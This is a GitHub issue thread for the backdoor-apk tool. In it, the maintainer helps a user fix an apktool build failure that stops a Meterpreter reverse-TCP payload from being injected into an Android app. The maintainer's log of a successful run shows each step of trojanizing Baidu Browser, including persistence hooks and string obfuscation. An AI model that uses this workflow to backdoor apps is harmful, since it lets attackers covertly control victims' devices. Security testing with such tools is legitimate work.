### ISSUE TITLE
rm: cannot remove ‘signing.keystore’: No such file or directory

### ISSUE THREAD

**Issue by mehr66t** [dana-at-cp/backdoor-apk#32] opened 2016-09-05 11:05 UTC
dear,
i have issue in recompile original project with backdoor
i always face failing in this part. even i signed one apk file and test again. but i failed as before.please help. Thank you in advance

**Comment by dana-at-cp** [comment] 2016-09-07 19:09
Please attach the run.log file after the failure.

**Comment by mehr66t** [comment] 2016-09-09 06:17
Dear,
FYI


[run.zip](https://github.com/dana-at-cp/backdoor-apk/files/463284/run.zip)

**Comment by mehr66t** [comment] 2016-09-09 06:43
my apk as well.
[badu.zip](https://github.com/dana-at-cp/backdoor-apk/files/463315/badu.zip)

**Comment by dana-at-cp** [comment] 2016-09-12 17:08
I see this in the run.log file:

```
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_8592019061118522257.tmp, p, --forced-package-id, 127, $
        at brut.androlib.Androlib.buildResourcesFull(Androlib.java:437)
        at brut.androlib.Androlib.buildResources(Androlib.java:371)
        at brut.androlib.Androlib.build(Androlib.java:281)
        at brut.androlib.Androlib.build(Androlib.java:254)
        at brut.apktool.Main.cmdBuild(Main.java:224)
        at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_8592019061118522257.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 19, $
        at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:436)
        at brut.androlib.Androlib.buildResourcesFull(Androlib.java:423)
        ... 5 more
Caused by: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_8592019061118522257.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 19, --version-code, 165, --version-na$
        at brut.util.OS.exec(OS.java:97)
        at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:430)
        ... 6 more
Caused by: java.io.IOException: Cannot run program "/tmp/brut_util_Jar_8592019061118522257.tmp": error=2, No such file or directory
        at java.lang.ProcessBuilder.start(ProcessBuilder.java:1047)
        at brut.util.OS.exec(OS.java:90)
        ... 7 more
Caused by: java.io.IOException: error=2, No such file or directory
        at java.lang.UNIXProcess.forkAndExec(Native Method)
        at java.lang.UNIXProcess.<init>(UNIXProcess.java:187)
        at java.lang.ProcessImpl.start(ProcessImpl.java:130)
        at java.lang.ProcessBuilder.start(ProcessBuilder.java:1028)
        ... 8 more
```

This error, from apktool, is identical to the error being reported in another open issue. As of right now, the root cause is not known.

**Comment by dana-at-cp** [comment] 2016-09-12 17:09
This appears to be a duplicate of issue: #30

**Closed by dana-at-cp** 2016-09-12 17:09 UTC

**Comment by dana-at-cp** [comment] 2016-09-12 18:38
FYI. The APK file you provided does not recompile for me as well but I get a slightly different error in the logs. Did you provide the original APK? Is it a legit copy from the Google Play Store or did you obtain it from somewhere else on the Internet?

**Comment by mehr66t** [comment] 2016-09-12 20:15
i got it from internet. for apktool what should i do. thanks

**Comment by dana-at-cp** [comment] 2016-09-12 20:47
I have a known good copy of Baidu Browser that you can use to test.

Here's the backdoor-apk.sh script output from a run that completed moments ago:

```
root@kali:~/Scripts/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh BaiduBrowser.apk 
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 10.6.9.31:1337
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Scripts/github/backdoor-apk/backdoor-apk# date
Mon Sep 12 16:46:01 EDT 2016
root@kali:~/Scripts/github/backdoor-apk/backdoor-apk#
```

**Comment by mehr66t** [comment] 2016-09-13 07:16
dear can u share your apk. thanks

**Comment by dana-at-cp** [comment] 2016-09-13 16:22
@mehr66t It's shared in my previous comment.

**Comment by mehr66t** [comment] 2016-09-15 06:28
it worked! well done and thanks.

**Comment by dana-at-cp** [comment] 2016-09-15 17:59
Beware of grabbing APK files from random places out on the Internet. They have mostly likely been tampered with in some fashion. Apktool generally fails to decompile/compile when an APK itself is in a bad state. If you stick with legitimate APK files from the Google Play store then you probably won't see Apktool failures.
